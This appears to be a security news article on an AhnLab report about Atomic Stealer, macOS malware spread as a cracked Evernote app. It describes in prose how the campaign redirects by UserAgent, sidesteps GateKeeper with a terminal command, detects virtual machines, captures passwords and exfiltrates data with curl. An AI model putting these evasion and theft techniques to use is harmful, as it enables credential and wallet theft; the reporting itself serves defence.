Ddos 
A new cyberattack is targeting macOS users, with the Atomic Stealer malware being distributed under the guise of a cracked version of the popular Evernote application. AhnLab Security intelligence Center (ASEC) has uncovered this malicious campaign, highlighting the deceptive tactics employed by threat actors to compromise user systems.
Atomic Stealer is a potent information-stealing malware specifically designed to infiltrate macOS environments. Once installed, it can extract a wide range of sensitive data, including browser information, system keychain data, cryptocurrency wallet information, and general system information.
One of the more insidious features of this campaign is its adaptive delivery strategy. When a user lands on the malicious website, it checks the browser UserAgent string to determine the operating system.
“If the UserAgent is for macOS, the user is redirected to the Atomic Stealer installation page. If the UserAgent is for Windows, the user is redirected to the LummaC2 malware installation page,” ASEC noted.
This dynamic approach allows threat actors to target both macOS and Windows environments from a single infrastructure.
To install Atomic Stealer, users are prompted to execute a terminal command, cleverly sidestepping Apple’s GateKeeper security mechanism.
“This method is likely used to bypass the GateKeeper pop-up that appears when an externally downloaded file is executed,” the report warned.
Once executed, the malware also performs virtual machine detection—looking for strings like “QEMU” and “VMware”—to avoid running in a sandbox or analysis environment.
“Atomic Stealer collects system information using the ‘system_profiler’ and ‘SPMemoryDataType’ commands… then checks for the ‘QEMU’ or ‘VMware’ string in the metadata.”
The malware displays a fake warning window disguised as a legitimate prompt.
“When the user enters the password, it uses the ‘dscl . authonly’ command to validate and store the entered password.”
This password, alongside a trove of other data, is collected using AppleScript and stored in the /tmp directory. The contents—ranging from keychains and browser data to cryptocurrency wallets—are compressed into an archive (out.zip) and exfiltrated to the attacker’s server using curl, before the malware cleans up after itself.
According to AhnLab, the malware is often spread through sites promoted by Google Ads, pushing fake Evernote cracks and other popular software bait.
Donate